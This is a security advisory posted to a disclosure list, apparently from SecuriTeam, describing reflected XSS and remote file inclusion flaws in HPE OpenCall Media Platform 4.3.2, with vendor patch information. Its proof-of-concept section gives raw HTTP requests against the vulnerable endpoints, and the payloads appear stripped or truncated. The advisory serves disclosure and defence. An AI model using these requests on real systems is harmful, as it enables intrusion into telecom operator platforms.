[FD] SSD Advisory – HPE OpenCall Media Platform (OCMP) Multiple Vulnerabilities

Link: http://ift.tt/2oCSIm3 SSD Advisory – HPE OpenCall Media Platform (OCMP) Multiple Vulnerabilities Want to get paid for a vulnerability similar to this one? Contact us at: ssd@beyondsecurity.com Vulnerabilities Summary The following advisory describes Reflected Cross-Site Scripting (XSS) vulnerabilities and a Remote File Inclusion vulnerability that when combined can lead to Code Execution, were found in HP OpenCall Media Platform (OCMP), version 4.3.2. HPE OpenCall Media Platform (OCMP) is a suite of software and hardware applications which allow implementation of common telecom operator services such as voicemail, sms (short message service), prepaid, billing, hlr, etc. It implements industry standard telecom protocols and standards such as SS7, ISUP, TCAP, SIP, MRCP, RTSP, and VoiceXML. HPE OpenCall Media Platform offers a highly scalable, easy-to-manage, carrier-grade media platform that adapts to future networks and applications. Through its strong support of open standards and protocols, new applications can be rapidly developed and deployed in a way that preserves investments and reduces capital expenditures (CAPEX) and operational expenditure (OPEX). There are 3 different components that are vulnerable in HPE OpenCall Media Platform (OCMP), and for each component has the following vulnerabilities: Application Content Manager Reflected Cross-Site Scripting (XSS) – /mcm/resources/ Platform Administration Tool Reflected Cross-Site Scripting (XSS) that lead to Remote Code Execution Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE0 parameter Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE1 parameter Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE2 parameter Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE3 parameter Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME0 parameter Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME1 parameter Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME2 parameter Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME3 parameter Reflected Cross-Site Scripting (XSS) – GetMapAction function Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NUM parameter Reflected Cross-Site Scripting (XSS) – GetMapAction function, NAME parameter Reflected Cross-Site Scripting (XSS) – cdrdispatch function, next parameter Reflected Cross-Site Scripting (XSS) – cdrdispatch function, sessionType parameter VoiceXML Administration Tool Reflected Cross-Site Scripting (XSS) – event.do function Reflected Cross-Site Scripting (XSS) – call.do function Remote File Inclusion – proxylink.do function Credit An independent security researcher Paolo Stagno from VoidSec has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. Vendor Responses HPE has released patches to address this vulnerability, for more details see: http://ift.tt/2pv5J6i Vulnerabilities Details Application Content Manager – /mcm/resources/ HPE OpenCall Media Platform (OCMP) does not sanitize /mcm/resources/ “description” and “prototype” parameters input. An attacker can inject malicious Java script to trigger the Reflected Cross-Site Scripting (XSS). Proof of Concept An Attacker send the following POST request to the victims machine : POST http://ift.tt/2q9GmTA HTTP/1.1 Host: 127.0.0.1:8443 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Content-Type: application/mcm+json; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://ift.tt/2pvkIgv Content-Length: 54 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache { "": "", "description": ""} The server will respond with: HTTP/1.1 204 No Content X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 Date: Wed, 23 Sep 2015 16:13:35 GMT Server: Web Server Then the attacker will send the second request to trigger the Cross-Site Scripting (XSS): GET http://ift.tt/2q9OgMN HTTP/1.1 Host: 127.0.0.1:8443 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 X-Requested-With: XMLHttpRequest Referer: http://ift.tt/2pvkIgv Connection: keep-alive The server will respond with: HTTP/1.1 200 OK X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 Cache-control: no-cache Content-Type: application/json Transfer-Encoding: chunked Date: Wed, 23 Sep 2015 16:13:35 GMT Server: Web Server VoiceXML Administration Tool – call.do function HPE OpenCall Media Platform (OCMP) does not sanitize call.do function parameters input. An attacker can inject malicious Java script to trigger the Reflected Cross-Site Scripting (XSS). The vulnerable URL: /om/call.do?action=list_calls&type=XSS_HERE Proof of Concept An Attacker send the following GET request to the victims machine: GET /om/call.do?action=list_calls&type=Active637a3